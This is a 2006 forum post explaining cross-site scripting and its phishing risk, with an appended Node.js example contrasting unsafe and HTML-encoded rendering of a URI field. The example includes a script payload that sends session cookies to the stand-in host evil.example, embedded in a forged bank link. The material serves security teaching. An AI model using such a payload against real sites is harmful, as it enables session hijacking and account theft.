tricore Guest
Posted: Mon Dec 18, 2006 5:44 am Post subject: How to defeat the new No. 1 security threat:
Cross-site scripting, often abbreviated XSS, is a class of Web security issues. A recent research report stated that XSS is now the top security risk.
In a typical XSS scenario, a Web page might use JavaScript to dynamically generate some document content based on a field in a Uniform Resource Identifier (URI). In the normal course of events, the site itself would generate legitimate information for that field.
If, however, the script that generated the new content did not filter the URI, it would be possible for an attacker to feed the page a custom-designed URI that ran a script. The script could do almost anything, and the user would never know that he wasn't seeing legitimate content unless the hijacker was blatant.
This is potentially very bad, since it is one way to enable phishing. For example, suppose a Web page with a cross-site scripting vulnerability belonged to a bank. An attacker aware of the vulnerability could forge e-mails purporting to be from the bank, with URIs that indeed led to the bank's site, but contained some malicious script that wouldn't be obvious to a casual observer. Once a user clicked on the link in the e-mail and logged into the bank site, their login credentials (in the form of cookies) for the current session would be transmitted to the attacker, who would be able to take over the user's account as long as the session was active.
This is considerably worse than an attack that takes users to a forged Web page, because it can, in principle, bypass most forms of authentication protection. After all, it's using the bank's own authentication system, and then hijacking the results. David Flanagan, author of JavaScript: The Definitive Guide, says cross-site scripting "enables a pernicious vulnerability whose roots go deep into the architecture of the Web."
Some history
Cross-site scripting first received wide notice in February 2000, when CERT® Advisory CA-2000-02 "Malicious HTML Tags Embedded in Client Web Requests" was published. The original summary was:
"A Web site may inadvertently include malicious HTML tags or script in a dynamically generated page based on unvalidated input from untrustworthy sources. This can be a problem when a Web server does not adequately ensure that generated pages are properly encoded to prevent unintended execution of scripts, and when input is not validated to prevent malicious HTML from being presented to the user."
The systems affected were listed as "Web browsers" and "Web servers that dynamically generate pages based on unvalidated input."
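The scenario the post describes (a page whose JavaScript builds document content from a field in the URI without filtering it, and an attacker mailing a link to the real site with script in that field) is shown below as an added example; it is not code from the post or from any site it mentions. The function names, the `name` query parameter, the `bank.example`/`evil.example` hosts and the sample link are all made up for illustration. It runs under Node.js without a browser: the "unsafe" renderer stands in for `document.write()` or `innerHTML`, and the "safe" one encodes the field the way the CERT advisory recommends.

```javascript
// Added example: DOM-based XSS sink versus output encoding (Node.js, no browser needed).
// All names and hosts are illustrative assumptions, not taken from the original post.

// Pull the "name" field out of the page URI (assumption: the page greets the
// visitor by a name carried in the query string, as in the scenario above).
function nameFromUri(uri) {
  const params = new URL(uri).searchParams;
  return params.get("name") ?? "guest";
}

// Vulnerable rendering: the URI field is concatenated straight into HTML.
// In a browser this is the `document.body.innerHTML = ...` or `document.write(...)`
// pattern, which parses and executes any tags the attacker placed in the URI.
function renderGreetingUnsafe(uri) {
  return "<h1>Welcome, " + nameFromUri(uri) + "</h1>";
}

// Minimal HTML entity encoder for text placed in an element body or attribute.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened rendering: encode the untrusted field before it touches HTML.
// In a real page, prefer `element.textContent = name`, which never parses markup.
function renderGreetingSafe(uri) {
  return "<h1>Welcome, " + escapeHtml(nameFromUri(uri)) + "</h1>";
}

// Crude detector used only to demonstrate the difference: does the fragment
// contain a script tag or an inline event-handler attribute?
function containsActiveContent(html) {
  return /<script[\s>]/i.test(html) || /\son\w+\s*=/i.test(html);
}

// Constructed sample: a link an attacker might mail out. It points at the genuine
// site, but the "name" field carries script that ships the session cookie off-site.
const ATTACK_PAYLOAD =
  '<script>new Image().src="https://evil.example/c?"+document.cookie</script>';
const ATTACK_URI =
  "https://bank.example/welcome?name=" + encodeURIComponent(ATTACK_PAYLOAD);

// Stand-alone demo when run directly with `node`.
if (typeof require !== "undefined" && require.main === module) {
  console.log("unsafe:", renderGreetingUnsafe(ATTACK_URI));
  console.log("safe:  ", renderGreetingSafe(ATTACK_URI));
}
```

Running it prints the unsafe fragment with a live `<script>` element and the safe fragment with `&lt;script&gt;` rendered as harmless text; the encoded version is what a server or client must emit when it cannot use a text-only DOM property.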